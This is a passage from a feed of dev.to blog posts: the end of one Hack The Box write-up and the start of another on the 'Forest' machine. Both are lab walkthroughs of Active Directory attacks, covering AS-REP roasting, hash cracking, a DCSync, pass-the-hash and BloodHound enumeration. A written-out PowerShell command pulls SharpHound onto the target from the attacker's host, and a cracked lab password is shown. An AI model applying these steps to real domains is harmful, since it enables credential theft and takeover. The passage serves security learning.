&lt;h3&gt;
  
  
  Privilege Escalation:
&lt;/h3&gt;

&lt;p&gt;Privilege escalation on this machine was relatively straightforward, mainly because I had already learned about WinPEAS from the HTB Archetype machine.&lt;/p&gt;

&lt;p&gt;WinPEAS is a Windows enumeration tool that checks various parts of a system for potential privilege-escalation opportunities, such as misconfigured services, permissions, stored credentials, and other security weaknesses.&lt;/p&gt;

&lt;p&gt;I used WinPEAS to enumerate the machine and look for anything that could help me escalate my privileges.&lt;/p&gt;

&lt;p&gt;For a more detailed explanation of how to download WinPEAS and run it on the Windows machine, you can refer to my HTB Archetype write-up.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faa2if5vvk5q9syolsbqu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Faa2if5vvk5q9syolsbqu.png" alt=" " width="800" height="613"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After running WinPEAS, I found credentials for a service account named svc_loanmanager&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhvn139f9x42xq9gnkij9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhvn139f9x42xq9gnkij9.png" alt=" " width="800" height="563"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now that I had the credentials for svc_loanmanager, I knew I probably (hopefully) needed to make use of this information somehow.&lt;/p&gt;

&lt;p&gt;The next thing that came to mind was figuring out what privileges this account had and what relationships it had with other users, groups, and computers in the domain.&lt;/p&gt;

&lt;p&gt;To map out these relationships, BloodHound was the obvious tool to use.&lt;/p&gt;

&lt;p&gt;I first tried using bloodhound-python to enumerate the objects and relationships within the Active Directory environment. If that didn’t work, I would have had to fall back to SharpHound and run the enumeration from the Windows machine instead.&lt;/p&gt;

&lt;p&gt;Fortunately, bloodhound-python worked, so I was able to collect the data and ingest the resulting JSON files into BloodHound for further analysis.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0ugm3gszw0pe47ynwwl1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F0ugm3gszw0pe47ynwwl1.png" alt=" " width="799" height="261"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frcxzz2r9dxavzxlzyb7d.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frcxzz2r9dxavzxlzyb7d.png" alt=" " width="800" height="479"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then went to the “Shortest Path to Domain Admin” section in BloodHound, but svc_loanmanager was nowhere to be seen.&lt;/p&gt;

&lt;p&gt;At this point, I couldn’t see any obvious attack path from the account to Domain Admin, so I needed to dig a little deeper&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6rfav5ntrbbtotomnh6n.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F6rfav5ntrbbtotomnh6n.png" alt=" " width="800" height="451"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since our goal is to ultimately gain control of the domain, I wanted to see which objects had control or administrative privileges over the Active Directory domain.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy1ildw337r4zqu7pmjop.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fy1ildw337r4zqu7pmjop.png" alt=" " width="800" height="572"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Bingo! We found that the svc_loanmanager account actually has the GetChangesAll privilege over the Active Directory domain.&lt;/p&gt;

&lt;p&gt;This was a significant finding because GetChangesAll is one of the permissions required to perform a DCSync attack. DCSync abuses Active Directory replication functionality to request password-related data for domain accounts as if the requesting account were another domain controller.&lt;/p&gt;

&lt;p&gt;This meant I could potentially use impacket-secretsdump with the svc_loanmanager credentials to perform a DCSync attack and extract credential material for domain users, including the Domain Administrator account.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhrmvqdqlgr0zhqvkzajh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fhrmvqdqlgr0zhqvkzajh.png" alt=" " width="800" height="572"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Get the svc_loanmanager account username in the Active Directory&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F59r8uwvee15m7jdx9xdc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F59r8uwvee15m7jdx9xdc.png" alt=" " width="799" height="333"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I then used impacket-secretsdump with the svc_loanmanager credentials to perform the DCSync attack.&lt;/p&gt;

&lt;p&gt;The attack was successful, and I was able to retrieve the NTLM hash of the Domain Administrator account.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fte90dzmhxpok94wcptq7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fte90dzmhxpok94wcptq7.png" alt=" " width="800" height="441"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;With this hash, I could use Pass-the-Hash to authenticate as the Domain Administrator without needing to know the account’s plaintext password. &lt;/p&gt;

&lt;p&gt;Finally, I used impacket-psexec with the Domain Administrator’s NTLM hash to authenticate to the machine using Pass-the-Hash.&lt;/p&gt;

&lt;p&gt;Once I obtained a shell as Domain Administrator, I navigated to the Administrator’s Desktop and retrieved the root flag, completing the machine.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flxfih7i5n1j6px87wzt4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Flxfih7i5n1j6px87wzt4.png" alt=" " width="799" height="405"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>infosec</category>
      <category>learning</category>
      <category>security</category>
    </item>
    <item>
      <title>HTB - Forest</title>
      <dc:creator>Jung</dc:creator>
      <pubDate>Tue, 22 Sep 2026 20:49:20 +0000</pubDate>
      <link>https://dev.to/zkrnvkf/htb-forest-23a0</link>
      <guid>https://dev.to/zkrnvkf/htb-forest-23a0</guid>
      <description>&lt;p&gt;I’m planning to take the TCM Security PJPT certification exam next Monday. I’ve finished going through the PEH course, and I wanted to spend some time working on HTB machines to put some of the techniques and methodologies I learned into practice and build up my confidence for the exam.&lt;/p&gt;

&lt;p&gt;While looking around online, I came across the Forest machine, which seems to be one of the more well-known machines for getting some hands-on experience with Active Directory attacks, so I decided to give it a try.&lt;/p&gt;

&lt;p&gt;I got stuck here and there along the way, but overall, it was a really fun machine to work on. I also learned quite a lot from it, especially when it comes to Active Directory enumeration and attacking AD environments.&lt;/p&gt;

&lt;p&gt;Although this machine is categorized as “Easy”, I’d recommend having some basic Active Directory knowledge before giving it a try. Without it, you’ll probably find yourself very lost&lt;/p&gt;

&lt;p&gt;OS: Windows&lt;br&gt;
Difficulty: Easy&lt;/p&gt;

&lt;p&gt;After the nmap enumeration, we get a pretty long output:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="gp"&gt;└─#&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;nmap &lt;span class="nt"&gt;-T4&lt;/span&gt; &lt;span class="nt"&gt;--min-rate&lt;/span&gt; 5000 &lt;span class="nt"&gt;-p-&lt;/span&gt; &lt;span class="nt"&gt;-sV&lt;/span&gt; &lt;span class="nt"&gt;-sC&lt;/span&gt; 10.129.89.197 
&lt;span class="go"&gt;Starting Nmap 7.99 ( https://nmap.org ) at 2026-09-21 02:52 -0400
Nmap scan report for 10.129.89.197
Host is up (0.25s latency).
Not shown: 65511 closed tcp ports (reset)
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2026-09-21 06:58:49Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49668/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49681/tcp open  msrpc        Microsoft Windows RPC
49698/tcp open  msrpc        Microsoft Windows RPC
50029/tcp open  msrpc        Microsoft Windows RPC
&lt;/span&gt;&lt;span class="gp"&gt;Service Info: Host: FOREST;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;OS: Windows&lt;span class="p"&gt;;&lt;/span&gt; CPE: cpe:/o:microsoft:windows
&lt;span class="go"&gt;
Host script results:
|_clock-skew: mean: 2h26m21s, deviation: 4h02m30s, median: 6m20s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2026-09-20T23:59:42-07:00
| smb-security-mode: 
&lt;/span&gt;&lt;span class="gp"&gt;|   account_used: &amp;lt;blank&amp;gt;&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="go"&gt;|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-09-21T06:59:43
|_  start_date: 2026-09-21T06:42:51
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;From the scan results, we can identify several services and pieces of information that give us a good indication of the target’s role:&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;DNS is running, which is commonly used within Active Directory environments for name resolution.&lt;/li&gt;
&lt;li&gt;Kerberos is running, which is a key authentication protocol used by Active Directory.&lt;/li&gt;
&lt;li&gt;LDAP is running, which is commonly used to query and interact with Active Directory directory services.&lt;/li&gt;
&lt;li&gt;The domain name is htb.local.&lt;/li&gt;
&lt;li&gt;The hostname of the machine is FOREST.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;The combination of Kerberos, LDAP, and DNS, along with the presence of an Active Directory domain, is a strong indicator that this machine is a Domain Controller (DC).&lt;/p&gt;

&lt;p&gt;A Domain Controller is a Windows server responsible for managing an Active Directory domain. Among other things, it handles user and computer accounts, authentication through Kerberos, and directory queries through LDAP.&lt;/p&gt;

&lt;p&gt;Based on these findings, we can reasonably conclude that FOREST is acting as a Domain Controller for the htb.local domain.&lt;/p&gt;

&lt;p&gt;At this point, I knew that one of the first things I should do was enumerate the users in the htb.local domain. But honestly, I was stuck haha. I had no idea where to begin.&lt;/p&gt;

&lt;p&gt;Since we were only given a single IP address for the target machine rather than a subnet, some of the techniques I had learned from the PEH course didn’t really apply here. For example, I couldn’t make use of LLMNR poisoning or IPv6 attacks, since those typically rely on being in the same network environment as the target. SMB Relay was also not an option because, based on my Nmap enumeration, SMB message signing was enabled and required.&lt;/p&gt;

&lt;p&gt;I didn’t want to rely too heavily on HTB’s guided mode, as I wanted to figure things out on my own. However, I eventually had to take a look at the hints, and that’s when I came across anonymous LDAP authentication.&lt;/p&gt;

&lt;p&gt;This was something I hadn’t considered before, and it gave me a starting point for enumerating information from the Active Directory environment.&lt;/p&gt;

&lt;p&gt;So I went to search Google for “anonymous LDAP enumeration”. I came across an article that introduced me to windapsearch.py, which looked like a useful tool for enumerating information from an LDAP server.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8faocf2br06pkdmvmvy7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F8faocf2br06pkdmvmvy7.png" alt=" " width="799" height="282"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxe4tuffk2w2enmdaauu3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fxe4tuffk2w2enmdaauu3.png" alt=" " width="800" height="422"&gt;&lt;/a&gt;&lt;br&gt;
The github link for windapsearch -&amp;gt; &lt;a href="https://github.com/ropnop/windapsearch" rel="noopener noreferrer"&gt;https://github.com/ropnop/windapsearch&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After cloning the repository, I ran windapsearch.py with ObjectClass=* to perform a broad LDAP enumeration of the domain. This allowed me to retrieve different types of objects from Active Directory, including users, computers, groups, and other directory objects.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvqb68ydzcnzxifffhpm3.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fvqb68ydzcnzxifffhpm3.png" alt=" " width="800" height="548"&gt;&lt;/a&gt;&lt;br&gt;
From the output, I only wanted to extract the names that appeared after the first CN= and before the first , in each entry. Rather than manually going through the output, I asked ChatGPT to help me come up with a command that would extract these values and save them into a users.txt file.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcu077glcxhre24seyawb.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fcu077glcxhre24seyawb.png" alt=" " width="792" height="37"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After getting the users.txt file, I realised that I could use impacket-GetNPUsers to check whether any of the domain accounts had Kerberos pre-authentication disabled.&lt;/p&gt;

&lt;p&gt;I thought of this because, normally, when a user requests a TGT from the KDC (Key Distribution Center), they first need to prove their identity through Kerberos pre-authentication. The KDC then uses information associated with the user’s secret to process the authentication request and, if everything checks out, issues a TGT.&lt;/p&gt;

&lt;p&gt;However, if Kerberos pre-authentication is disabled for an account, the user can request authentication without first providing that proof. The KDC will respond with an AS-REP containing encrypted data derived from the user’s password.&lt;/p&gt;

&lt;p&gt;This means that if we can obtain the AS-REP response for an account with pre-authentication disabled, we can take it offline and attempt to crack the response to recover the user’s password. This technique is commonly known as AS-REP Roasting.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F037lxkuq5rkrd4jcqmly.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F037lxkuq5rkrd4jcqmly.png" alt=" " width="799" height="78"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Once I ran the command, I got quite a lot of output, probably because the users.txt file contained more than just actual user accounts. However, after going through the results, I eventually managed to find a service account called svc-alfresco that had Kerberos pre-authentication disabled.&lt;/p&gt;

&lt;p&gt;The command returned an AS-REP hash for the account, which meant I could potentially attempt to crack it offline and recover the account’s password.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fotgisvm32ie861e67iox.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fotgisvm32ie861e67iox.png" alt=" " width="799" height="114"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I saved the AS-REP hash into a separate file and then tried cracking it with Hashcat. I wasn’t sure which Hashcat mode to use, so I Googled it and found that mode 18200 is used for Kerberos 5 AS-REP etype 23 hashes.&lt;/p&gt;

&lt;p&gt;I ran Hashcat with the appropriate wordlist and managed to successfully crack the hash, giving me the password for the svc-alfresco account (s3rvice)&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2lo0up2xdqvcpslwvma9.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F2lo0up2xdqvcpslwvma9.png" alt=" " width="800" height="490"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So now we have a user account:&lt;br&gt;
Username: svc-alfresco&lt;br&gt;
Password: s3rvice&lt;/p&gt;

&lt;p&gt;I knew I couldn’t use impacket-psexec with the svc-alfresco account since it obviously wasn’t an administrator account. However, I remembered from my HTB Responder write-up that if WinRM (port 5985) is exposed and we have valid credentials for a user who is allowed to use WinRM, we can potentially authenticate to the machine using Evil-WinRM.&lt;/p&gt;

&lt;p&gt;Since port 5985 was open and I now had valid credentials for svc-alfresco, I decided to give it a try and it worked. Navigated to svc-alfresco's Desktop to find the user flag&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frv64mzb8hz8avvys2wx2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Frv64mzb8hz8avvys2wx2.png" alt=" " width="799" height="369"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffp6x1h0ehxogu4sefopy.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Ffp6x1h0ehxogu4sefopy.png" alt=" " width="799" height="339"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Privilege Escalation
&lt;/h3&gt;

&lt;p&gt;I was pretty excited at this point because I finally got to actually use BloodHound to enumerate the Active Directory environment and look for potential paths to higher-privileged accounts.&lt;/p&gt;

&lt;p&gt;I ran bloodhound-python to collect information about the users, groups, computers, and other objects in the domain. However, I ran into a problem because the svc-alfresco account couldn’t authenticate to LDAP, so I wasn’t able to collect the information I needed. &lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F58vhaqbdfrhxzb1we5cr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2F58vhaqbdfrhxzb1we5cr.png" alt=" " width="800" height="410"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So I went to google if there is a way to ingest bloodhound data from within window machine itself and surprisingly, there was which is called "sharphound"&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fwf3ssz0lp19hydpfezt0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fwf3ssz0lp19hydpfezt0.png" alt=" " width="799" height="488"&gt;&lt;/a&gt;&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fwodnors8wwkpjhzmq3x2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fwodnors8wwkpjhzmq3x2.png" alt=" " width="800" height="476"&gt;&lt;/a&gt;&lt;br&gt;
github repo link -&amp;gt; &lt;a href="https://github.com/SpecterOps/SharpHound" rel="noopener noreferrer"&gt;https://github.com/SpecterOps/SharpHound&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I went to the Releases section of the GitHub repository and downloaded the SharpHound binary. I then started a simple HTTP server in the directory on my Kali machine containing SharpHound.exe.&lt;/p&gt;

&lt;p&gt;From the target machine, I used PowerShell’s wget command to download the file from my Kali machine. In PowerShell, wget is an alias for Invoke-WebRequest, which can be used to retrieve files over HTTP.&lt;br&gt;
&lt;code&gt;wget "http://{kali ip address}/SharpHound.exe" -outfile SharpHound.exe&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;One thing to take note of is that when I initially downloaded the latest SharpHound.exe binary, I ran into an error saying that the installed .NET Runtime version was not compatible.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqi08r5262bpoaju1utaa.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fqi08r5262bpoaju1utaa.png" alt=" " width="800" height="73"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;I fixed this by downloading an older version of the SharpHound binary, which worked with the .NET version available on the target machine.&lt;/p&gt;

&lt;p&gt;You may run into the same issue, so if the latest version doesn’t work, try using an older release of SharpHound.&lt;/p&gt;

&lt;p&gt;Once SharpHound finished running, it generated a ZIP file containing the collected Active Directory data. I downloaded this ZIP file onto my Kali machine so that I could upload it to BloodHound and let it ingest the data.&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fv6fxlz6o9464siffxgzr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.us-east-2.amazonaws.com%2Fuploads%2Farticles%2Fv6fxlz6o9464siffxgzr.png" alt=" " width="799" height="392"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Upload the JSON files containing the Active Directory data.&lt;br&gt;
